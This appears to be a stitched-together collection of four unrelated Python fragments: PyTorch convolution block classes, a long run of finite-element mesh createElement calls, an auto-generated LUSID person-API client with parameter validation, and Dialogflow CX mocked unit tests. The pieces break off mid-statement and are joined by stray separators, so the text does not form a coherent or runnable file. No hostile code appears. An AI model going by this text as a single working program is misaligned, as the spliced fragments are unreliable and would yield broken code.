super(DConvBottleneck, self).__init__()
self.conv1x1_down = nn.Conv2d(in_planes, bottleneck, kernel_size=1, stride=1, padding=0, bias=bias)
self.bn1 = nn.BatchNorm2d(bottleneck)
self.convdw = nn.Conv2d(bottleneck, bottleneck, kernel_size=kernel_size, stride=stride, padding=padding,
bias=bias, groups=bottleneck)
self.bn2= nn.BatchNorm2d(bottleneck)
self.conv1x1_up = nn.Conv2d(bottleneck, out_planes, kernel_size=1, stride=1, padding=0, bias=bias)
def forward(self, x):
out = F.relu(self.bn1(self.conv1x1_down(x)))
out = F.relu(self.bn2(self.convdw(out)))
out = self.conv1x1_up(out)
return out
class DConvB2(DConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvB2, self).__init__(in_planes, out_planes, out_planes//2,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class DConvB4(DConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvB4, self).__init__(in_planes, out_planes, out_planes//4,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class DConvB8(DConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvB8, self).__init__(in_planes, out_planes, out_planes//8,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class DConvB16(DConvBottleneck):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConvB16, self).__init__(in_planes, out_planes, out_planes//16,
stride=stride, kernel_size=kernel_size, padding=padding,
bias=bias)
class DConv3D(nn.Module):
def __init__(self, in_planes, out_planes, stride=1, kernel_size=3, padding=1, bias=False):
super(DConv3D, self).__init__()
# Separable conv approximating the 1x1 with a 3x3 conv3d
self.convdw = nn.Conv2d(in_planes,in_planes, kernel_size=kernel_size, stride=stride, padding=padding,
bias=bias,groups=in_planes)
self.bn = nn.BatchNorm2d(in_planes)
self.conv3d = nn.Conv3d(1, out_planes, kernel_size=(3,1,1), stride=1, padding=(1,0,0), bias=bias)
def forward(self, x):
o = F.relu(self.bn(self.convdw(x)))
o = o.unsqueeze(1)
#n, c, d, w, h = o.size()
return self.conv3d(o).mean(2)
def conv_function(convtype):
if convtype == 'Conv':
conv = Conv
elif convtype == 'DConv':
conv = DConv
elif convtype == 'DConvG2':
conv = DConvG2
elif convtype == 'DConvG4':
conv = DConvG4
elif convtype == 'DConvG8':
conv = DConvG8
elif convtype == 'DConvG16':
conv = DConvG16
elif convtype == 'DConvA2':
conv = DConvA2
elif convtype == 'DConvA4':
conv = DConvA4
elif convtype == 'DConvA8':
conv = DConvA8
elif convtype == 'DConvA16':
conv = DConvA16
elif convtype == 'Conv2x2':
conv = Conv2x2
elif convtype == 'ConvB2':
conv = ConvB2
elif convtype == 'ConvB4':
conv = ConvB4
elif convtype == 'ConvB8':
conv = ConvB8
elif convtype == 'ConvB16':
conv = ConvB16
elif convtype == 'DConvB2':
conv = DConvB2
elif convtype == 'DConvB4':
conv = DConvB4
elif convtype == 'DConvB8':
conv = DConvB8
elif convtype == 'DConvB16':
conv = DConvB16
elif convtype == 'DConv3D':
conv = DConv3D
elif convtype =='G2B2':
conv = G2B2
elif convtype =='G4B2':
conv = G4B2
elif convtype =='G8B2':
conv = G8B2
elif convtype =='G16B2':
conv = G16B2
elif convtype =='G2B4':
conv = G2B4
elif convtype =='G4B4':
conv = G4B4
elif convtype =='G8B4':
conv = G8B4
elif convtype =='G16B4':
conv = G16B4
elif convtype =='A2B2':
conv = A2B2
elif convtype =='A4B2':
conv = A4B2
elif convtype =='A8B2':
conv = A8B2
elif convtype =='A16B2':
conv = A16B2
elif convtype =='ACDC':
conv = ACDC
else:
raise ValueError('Conv "%s" not recognised'%convtype)
return conv
class BasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, stride, dropRate=0.0, conv=Conv):
super(BasicBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.relu1 = nn.ReLU(inplace=True)
self.conv1 = conv(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(out_planes)
self.relu2 = nn.ReLU(inplace=True)
self.conv2 = conv(out_planes, out_planes, kernel_size=3, stride=1,
padding=1, bias=False)
self.droprate = dropRate
self.equalInOut = | |
5526, 5527, 5533, 5532)
model.createElement(3920, 2687, 2688, 2694, 2693, 5527, 5528, 5534, 5533)
model.createElement(3921, 2688, 2689, 2695, 2694, 5528, 5529, 5535, 5534)
model.createElement(3922, 2689, 2690, 2696, 2695, 5529, 5530, 5536, 5535)
model.createElement(3923, 2690, 618, 617, 2696, 5530, 3065, 3066, 5536)
model.createElement(3924, 486, 2691, 2697, 487, 2415, 5531, 5537, 2414)
model.createElement(3925, 2691, 2692, 2698, 2697, 5531, 5532, 5538, 5537)
model.createElement(3926, 2692, 2693, 2699, 2698, 5532, 5533, 5539, 5538)
model.createElement(3927, 2693, 2694, 2700, 2699, 5533, 5534, 5540, 5539)
model.createElement(3928, 2694, 2695, 2701, 2700, 5534, 5535, 5541, 5540)
model.createElement(3929, 2695, 2696, 2702, 2701, 5535, 5536, 5542, 5541)
model.createElement(3930, 2696, 617, 616, 2702, 5536, 3066, 3067, 5542)
model.createElement(3931, 487, 2697, 2703, 488, 2414, 5537, 5543, 2413)
model.createElement(3932, 2697, 2698, 2704, 2703, 5537, 5538, 5544, 5543)
model.createElement(3933, 2698, 2699, 2705, 2704, 5538, 5539, 5545, 5544)
model.createElement(3934, 2699, 2700, 2706, 2705, 5539, 5540, 5546, 5545)
model.createElement(3935, 2700, 2701, 2707, 2706, 5540, 5541, 5547, 5546)
model.createElement(3936, 2701, 2702, 2708, 2707, 5541, 5542, 5548, 5547)
model.createElement(3937, 2702, 616, 615, 2708, 5542, 3067, 3068, 5548)
model.createElement(3938, 488, 2703, 2709, 489, 2413, 5543, 5549, 2412)
model.createElement(3939, 2703, 2704, 2710, 2709, 5543, 5544, 5550, 5549)
model.createElement(3940, 2704, 2705, 2711, 2710, 5544, 5545, 5551, 5550)
model.createElement(3941, 2705, 2706, 2712, 2711, 5545, 5546, 5552, 5551)
model.createElement(3942, 2706, 2707, 2713, 2712, 5546, 5547, 5553, 5552)
model.createElement(3943, 2707, 2708, 2714, 2713, 5547, 5548, 5554, 5553)
model.createElement(3944, 2708, 615, 614, 2714, 5548, 3068, 3069, 5554)
model.createElement(3945, 489, 2709, 2715, 490, 2412, 5549, 5555, 2411)
model.createElement(3946, 2709, 2710, 2716, 2715, 5549, 5550, 5556, 5555)
model.createElement(3947, 2710, 2711, 2717, 2716, 5550, 5551, 5557, 5556)
model.createElement(3948, 2711, 2712, 2718, 2717, 5551, 5552, 5558, 5557)
model.createElement(3949, 2712, 2713, 2719, 2718, 5552, 5553, 5559, 5558)
model.createElement(3950, 2713, 2714, 2720, 2719, 5553, 5554, 5560, 5559)
model.createElement(3951, 2714, 614, 613, 2720, 5554, 3069, 3070, 5560)
model.createElement(3952, 490, 2715, 2721, 491, 2411, 5555, 5561, 2410)
model.createElement(3953, 2715, 2716, 2722, 2721, 5555, 5556, 5562, 5561)
model.createElement(3954, 2716, 2717, 2723, 2722, 5556, 5557, 5563, 5562)
model.createElement(3955, 2717, 2718, 2724, 2723, 5557, 5558, 5564, 5563)
model.createElement(3956, 2718, 2719, 2725, 2724, 5558, 5559, 5565, 5564)
model.createElement(3957, 2719, 2720, 2726, 2725, 5559, 5560, 5566, 5565)
model.createElement(3958, 2720, 613, 612, 2726, 5560, 3070, 3071, 5566)
model.createElement(3959, 491, 2721, 2727, 492, 2410, 5561, 5567, 2409)
model.createElement(3960, 2721, 2722, 2728, 2727, 5561, 5562, 5568, 5567)
model.createElement(3961, 2722, 2723, 2729, 2728, 5562, 5563, 5569, 5568)
model.createElement(3962, 2723, 2724, 2730, 2729, 5563, 5564, 5570, 5569)
model.createElement(3963, 2724, 2725, 2731, 2730, 5564, 5565, 5571, 5570)
model.createElement(3964, 2725, 2726, 2732, 2731, 5565, 5566, 5572, 5571)
model.createElement(3965, 2726, 612, 611, 2732, 5566, 3071, 3072, 5572)
model.createElement(3966, 492, 2727, 2733, 493, 2409, 5567, 5573, 2408)
model.createElement(3967, 2727, 2728, 2734, 2733, 5567, 5568, 5574, 5573)
model.createElement(3968, 2728, 2729, 2735, 2734, 5568, 5569, 5575, 5574)
model.createElement(3969, 2729, 2730, 2736, 2735, 5569, 5570, 5576, 5575)
model.createElement(3970, 2730, 2731, 2737, 2736, 5570, 5571, 5577, 5576)
model.createElement(3971, 2731, 2732, 2738, 2737, 5571, 5572, 5578, 5577)
model.createElement(3972, 2732, 611, 610, 2738, 5572, 3072, 3073, 5578)
model.createElement(3973, 493, 2733, 2739, 494, 2408, 5573, 5579, 2407)
model.createElement(3974, 2733, 2734, 2740, 2739, 5573, 5574, 5580, 5579)
model.createElement(3975, 2734, 2735, 2741, 2740, 5574, 5575, 5581, 5580)
model.createElement(3976, 2735, 2736, 2742, 2741, 5575, 5576, 5582, 5581)
model.createElement(3977, 2736, 2737, 2743, 2742, 5576, 5577, 5583, 5582)
model.createElement(3978, 2737, 2738, 2744, 2743, 5577, 5578, 5584, 5583)
model.createElement(3979, 2738, 610, 609, 2744, 5578, 3073, 3074, 5584)
model.createElement(3980, 494, 2739, 2745, 495, 2407, 5579, 5585, 2406)
model.createElement(3981, 2739, 2740, 2746, 2745, 5579, 5580, 5586, 5585)
model.createElement(3982, 2740, 2741, 2747, 2746, 5580, 5581, 5587, 5586)
model.createElement(3983, 2741, 2742, 2748, 2747, 5581, 5582, 5588, 5587)
model.createElement(3984, 2742, 2743, 2749, 2748, 5582, 5583, 5589, 5588)
model.createElement(3985, 2743, 2744, 2750, 2749, 5583, 5584, 5590, 5589)
model.createElement(3986, 2744, 609, 608, 2750, 5584, 3074, 3075, 5590)
model.createElement(3987, 495, 2745, 2751, 496, 2406, 5585, 5591, 2405)
model.createElement(3988, 2745, 2746, 2752, 2751, 5585, 5586, 5592, 5591)
model.createElement(3989, 2746, 2747, 2753, 2752, 5586, 5587, 5593, 5592)
model.createElement(3990, 2747, 2748, 2754, 2753, 5587, 5588, 5594, 5593)
model.createElement(3991, 2748, 2749, 2755, 2754, 5588, 5589, 5595, 5594)
model.createElement(3992, 2749, 2750, 2756, 2755, 5589, 5590, 5596, 5595)
model.createElement(3993, 2750, 608, 607, 2756, 5590, 3075, 3076, 5596)
model.createElement(3994, 496, 2751, 2757, 497, 2405, 5591, 5597, 2404)
model.createElement(3995, 2751, 2752, 2758, 2757, 5591, 5592, 5598, 5597)
model.createElement(3996, 2752, 2753, 2759, 2758, 5592, 5593, 5599, 5598)
model.createElement(3997, 2753, 2754, 2760, 2759, 5593, 5594, 5600, 5599)
model.createElement(3998, 2754, 2755, 2761, 2760, 5594, 5595, 5601, 5600)
model.createElement(3999, 2755, 2756, 2762, 2761, 5595, 5596, 5602, 5601)
model.createElement(4000, 2756, 607, 606, 2762, 5596, 3076, 3077, 5602)
model.createElement(4001, 497, 2757, 2763, 498, 2404, 5597, 5603, 2403)
model.createElement(4002, 2757, 2758, 2764, 2763, 5597, 5598, 5604, 5603)
model.createElement(4003, 2758, 2759, 2765, 2764, 5598, 5599, 5605, 5604)
model.createElement(4004, 2759, 2760, 2766, 2765, 5599, 5600, 5606, 5605)
model.createElement(4005, 2760, 2761, 2767, 2766, 5600, 5601, 5607, 5606)
model.createElement(4006, 2761, 2762, 2768, 2767, 5601, 5602, 5608, 5607)
model.createElement(4007, 2762, 606, 605, 2768, 5602, 3077, 3078, 5608)
model.createElement(4008, 498, 2763, 2769, 499, 2403, 5603, 5609, 2402)
model.createElement(4009, 2763, 2764, 2770, 2769, 5603, 5604, 5610, 5609)
model.createElement(4010, 2764, 2765, 2771, 2770, 5604, 5605, 5611, 5610)
model.createElement(4011, 2765, 2766, 2772, 2771, 5605, 5606, 5612, 5611)
model.createElement(4012, 2766, 2767, 2773, 2772, 5606, 5607, 5613, 5612)
model.createElement(4013, 2767, 2768, 2774, 2773, 5607, 5608, 5614, 5613)
model.createElement(4014, 2768, 605, 604, 2774, 5608, 3078, 3079, 5614)
model.createElement(4015, 499, 2769, 2775, 500, 2402, 5609, 5615, 2401)
model.createElement(4016, 2769, 2770, 2776, 2775, 5609, 5610, 5616, 5615)
model.createElement(4017, 2770, 2771, 2777, 2776, 5610, 5611, 5617, 5616)
model.createElement(4018, 2771, 2772, 2778, 2777, 5611, 5612, 5618, 5617)
model.createElement(4019, 2772, 2773, 2779, 2778, 5612, 5613, 5619, 5618)
model.createElement(4020, 2773, 2774, 2780, 2779, 5613, 5614, 5620, 5619)
model.createElement(4021, 2774, 604, 603, 2780, 5614, 3079, 3080, 5620)
model.createElement(4022, 500, 2775, 2781, 501, 2401, 5615, 5621, 2400)
model.createElement(4023, 2775, 2776, 2782, 2781, 5615, 5616, 5622, 5621)
model.createElement(4024, 2776, 2777, 2783, 2782, 5616, 5617, 5623, 5622)
model.createElement(4025, 2777, 2778, 2784, 2783, 5617, 5618, 5624, 5623)
model.createElement(4026, 2778, 2779, 2785, 2784, 5618, 5619, 5625, 5624)
model.createElement(4027, 2779, 2780, 2786, 2785, 5619, 5620, 5626, 5625)
model.createElement(4028, 2780, 603, 602, 2786, 5620, 3080, 3081, 5626)
model.createElement(4029, 501, 2781, 2787, 502, 2400, 5621, 5627, 2399)
model.createElement(4030, 2781, 2782, 2788, 2787, 5621, 5622, 5628, 5627)
model.createElement(4031, 2782, 2783, 2789, 2788, 5622, 5623, 5629, 5628)
model.createElement(4032, 2783, 2784, 2790, 2789, 5623, 5624, 5630, 5629)
model.createElement(4033, 2784, 2785, 2791, 2790, 5624, 5625, 5631, 5630)
model.createElement(4034, 2785, 2786, 2792, 2791, 5625, 5626, 5632, 5631)
model.createElement(4035, 2786, 602, 601, 2792, 5626, 3081, 3082, 5632)
model.createElement(4036, 502, 2787, 2793, 503, 2399, 5627, 5633, 2398)
model.createElement(4037, 2787, 2788, 2794, 2793, 5627, 5628, 5634, 5633)
model.createElement(4038, 2788, 2789, 2795, 2794, 5628, 5629, 5635, 5634)
model.createElement(4039, 2789, 2790, 2796, 2795, 5629, 5630, 5636, 5635)
model.createElement(4040, 2790, 2791, 2797, 2796, 5630, 5631, 5637, 5636)
model.createElement(4041, 2791, 2792, 2798, 2797, 5631, 5632, 5638, 5637)
model.createElement(4042, 2792, 601, 600, 2798, 5632, 3082, 3083, 5638)
model.createElement(4043, 503, 2793, 2799, 504, 2398, 5633, 5639, 2397)
model.createElement(4044, 2793, 2794, 2800, 2799, 5633, 5634, 5640, 5639)
model.createElement(4045, 2794, 2795, 2801, 2800, 5634, 5635, 5641, 5640)
model.createElement(4046, 2795, 2796, 2802, 2801, 5635, 5636, 5642, 5641)
model.createElement(4047, 2796, 2797, 2803, 2802, 5636, 5637, 5643, 5642)
model.createElement(4048, 2797, 2798, 2804, 2803, 5637, 5638, 5644, 5643)
model.createElement(4049, 2798, 600, 599, 2804, 5638, 3083, 3084, 5644)
model.createElement(4050, 504, 2799, 2805, 505, 2397, 5639, 5645, 2396)
model.createElement(4051, 2799, 2800, 2806, 2805, 5639, 5640, 5646, 5645)
model.createElement(4052, 2800, 2801, 2807, 2806, 5640, 5641, 5647, 5646)
model.createElement(4053, 2801, 2802, 2808, 2807, 5641, 5642, 5648, 5647)
model.createElement(4054, 2802, 2803, 2809, 2808, 5642, 5643, 5649, 5648)
model.createElement(4055, 2803, 2804, 2810, 2809, 5643, 5644, 5650, 5649)
model.createElement(4056, 2804, 599, 598, 2810, 5644, 3084, 3085, 5650)
model.createElement(4057, 505, 2805, 2811, 506, 2396, 5645, 5651, 2395)
model.createElement(4058, 2805, 2806, 2812, 2811, 5645, 5646, 5652, 5651)
model.createElement(4059, 2806, 2807, 2813, 2812, 5646, 5647, 5653, 5652)
model.createElement(4060, 2807, 2808, 2814, 2813, 5647, 5648, 5654, 5653)
model.createElement(4061, 2808, 2809, 2815, 2814, 5648, 5649, 5655, 5654)
model.createElement(4062, 2809, 2810, 2816, 2815, 5649, 5650, 5656, 5655)
model.createElement(4063, 2810, 598, 597, 2816, 5650, 3085, 3086, 5656)
model.createElement(4064, 506, 2811, 2817, 507, 2395, 5651, 5657, 2394)
model.createElement(4065, 2811, 2812, 2818, 2817, 5651, 5652, 5658, 5657)
model.createElement(4066, 2812, 2813, 2819, 2818, 5652, 5653, 5659, 5658)
model.createElement(4067, 2813, 2814, 2820, 2819, 5653, 5654, 5660, 5659)
model.createElement(4068, 2814, 2815, 2821, 2820, 5654, 5655, 5661, 5660)
model.createElement(4069, 2815, 2816, 2822, 2821, 5655, 5656, 5662, 5661)
model.createElement(4070, 2816, 597, 596, 2822, 5656, 3086, 3087, 5662)
model.createElement(4071, 507, 2817, 2823, 508, 2394, 5657, 5663, 2393)
model.createElement(4072, 2817, 2818, 2824, 2823, 5657, 5658, 5664, 5663)
model.createElement(4073, 2818, 2819, 2825, 2824, 5658, 5659, 5665, 5664)
model.createElement(4074, 2819, 2820, 2826, 2825, 5659, 5660, 5666, 5665)
model.createElement(4075, 2820, 2821, 2827, 2826, 5660, 5661, 5667, 5666)
model.createElement(4076, 2821, 2822, 2828, 2827, 5661, 5662, 5668, 5667)
model.createElement(4077, 2822, 596, 595, 2828, 5662, 3087, 3088, 5668)
model.createElement(4078, 508, 2823, 2829, 509, 2393, 5663, 5669, 2392)
model.createElement(4079, 2823, 2824, 2830, 2829, | |
all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_person_relationships" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and ('id_type_scope' in local_var_params and # noqa: E501
len(local_var_params['id_type_scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_scope` when calling `get_person_relationships`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('id_type_scope' in local_var_params and # noqa: E501
len(local_var_params['id_type_scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_scope` when calling `get_person_relationships`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'id_type_scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['id_type_scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_scope` when calling `get_person_relationships`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('id_type_code' in local_var_params and # noqa: E501
len(local_var_params['id_type_code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_code` when calling `get_person_relationships`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('id_type_code' in local_var_params and # noqa: E501
len(local_var_params['id_type_code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_code` when calling `get_person_relationships`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'id_type_code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['id_type_code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `id_type_code` when calling `get_person_relationships`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_person_relationships`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_person_relationships`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_person_relationships`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('effective_at' in local_var_params and # noqa: E501
len(local_var_params['effective_at']) > 256): # noqa: E501
raise ApiValueError("Invalid value for parameter `effective_at` when calling `get_person_relationships`, length must be less than or equal to `256`") # noqa: E501
if self.api_client.client_side_validation and ('effective_at' in local_var_params and # noqa: E501
len(local_var_params['effective_at']) < 0): # noqa: E501
raise ApiValueError("Invalid value for parameter `effective_at` when calling `get_person_relationships`, length must be greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and 'effective_at' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_\+:\.]+$', local_var_params['effective_at']): # noqa: E501
raise ApiValueError("Invalid value for parameter `effective_at` when calling `get_person_relationships`, must conform to the pattern `/^[a-zA-Z0-9\-_\+:\.]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('filter' in local_var_params and # noqa: E501
len(local_var_params['filter']) > 2147483647): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `get_person_relationships`, length must be less than or equal to `2147483647`") # noqa: E501
if self.api_client.client_side_validation and ('filter' in local_var_params and # noqa: E501
len(local_var_params['filter']) < 0): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `get_person_relationships`, length must be greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and 'filter' in local_var_params and not re.search(r'^[\s\S]*$', local_var_params['filter']): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `get_person_relationships`, must conform to the pattern `/^[\s\S]*$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id_type_scope' in local_var_params:
path_params['idTypeScope'] = local_var_params['id_type_scope'] # noqa: E501
if 'id_type_code' in local_var_params:
path_params['idTypeCode'] = local_var_params['id_type_code'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'as_at' in local_var_params and local_var_params['as_at'] is not None: # noqa: E501
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
if 'identifier_types' in local_var_params and local_var_params['identifier_types'] is not None: # noqa: E501
query_params.append(('identifierTypes', local_var_params['identifier_types'])) # noqa: E501
collection_formats['identifierTypes'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfRelationship",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/persons/{idTypeScope}/{idTypeCode}/{code}/relationships', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def list_persons(self, id_type_scope, id_type_code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] ListPersons: List Persons # noqa: E501
List persons which have identifiers of a specific identifier type's scope and code, and satisfies filter criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_persons(id_type_scope, id_type_code, async_req=True)
>>> result = thread.get()
:param id_type_scope: Scope of the person identifier type. (required)
:type id_type_scope: str
:param id_type_code: Code of the person identifier type. (required)
:type id_type_code: str
:param effective_at: The effective datetime or cut label at which to list the people. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the people. Defaults to return the latest version of each people if not specified.
:type as_at: datetime
:param page: The pagination token to use to continue listing portfolios from a previous call to list portfolios. This value is returned from the previous call. If a pagination token is provided the filter, effectiveAt and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:type page: str
:param start: When paginating, skip this number of results.
:type start: int
:param limit: When paginating, limit the number of returned results to this many. Defaults to 65,535 if not specified.
:type limit: int
:param filter: Expression to filter the result set. For example, to filter on the LUPID, use \"lusidPersonId eq 'string'\" Read more about filtering results from LUSID here https://support.lusid.com/filtering-results-from-lusid.
:type filter: str
:param property_keys: A list of property keys from the \"Person\" domain to decorate onto each person. These take the format {domain}/{scope}/{code} e.g. \"Person/ContactDetails/Address\".
:type property_keys: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: PagedResourceListOfPerson
"""
kwargs['_return_http_data_only'] = True
return self.list_persons_with_http_info(id_type_scope, id_type_code, **kwargs) # noqa: E501
def list_persons_with_http_info(self, id_type_scope, id_type_code, **kwargs): # noqa: E501
"""[EXPERIMENTAL] ListPersons: List Persons # noqa: E501
List persons which have identifiers of a specific identifier type's scope and code, and satisfies filter criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_persons_with_http_info(id_type_scope, id_type_code, async_req=True)
>>> result = thread.get()
:param id_type_scope: Scope of the person identifier type. (required)
:type id_type_scope: str
:param id_type_code: Code of the person identifier type. (required)
:type id_type_code: str
:param effective_at: The effective datetime or cut label at which to list the people. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the people. Defaults to return the latest version of each people if not specified.
:type as_at: datetime
:param page: The pagination token to use to continue listing portfolios from a previous call to list portfolios. This value is returned from the previous call. If a pagination token is provided the | |
the request.
with mock.patch.object(
type(client.transport.delete_transition_route_group), "__call__"
) as call:
client.delete_transition_route_group()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == transition_route_group.DeleteTransitionRouteGroupRequest()
@pytest.mark.asyncio
async def test_delete_transition_route_group_async(
transport: str = "grpc_asyncio",
request_type=transition_route_group.DeleteTransitionRouteGroupRequest,
):
client = TransitionRouteGroupsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_transition_route_group), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_transition_route_group(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == transition_route_group.DeleteTransitionRouteGroupRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_transition_route_group_async_from_dict():
await test_delete_transition_route_group_async(request_type=dict)
def test_delete_transition_route_group_field_headers():
client = TransitionRouteGroupsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = transition_route_group.DeleteTransitionRouteGroupRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_transition_route_group), "__call__"
) as call:
call.return_value = None
client.delete_transition_route_group(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_transition_route_group_field_headers_async():
client = TransitionRouteGroupsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = transition_route_group.DeleteTransitionRouteGroupRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_transition_route_group), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_transition_route_group(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_transition_route_group_flattened():
client = TransitionRouteGroupsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_transition_route_group), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_transition_route_group(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_transition_route_group_flattened_error():
client = TransitionRouteGroupsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_transition_route_group(
transition_route_group.DeleteTransitionRouteGroupRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_delete_transition_route_group_flattened_async():
client = TransitionRouteGroupsAsyncClient(
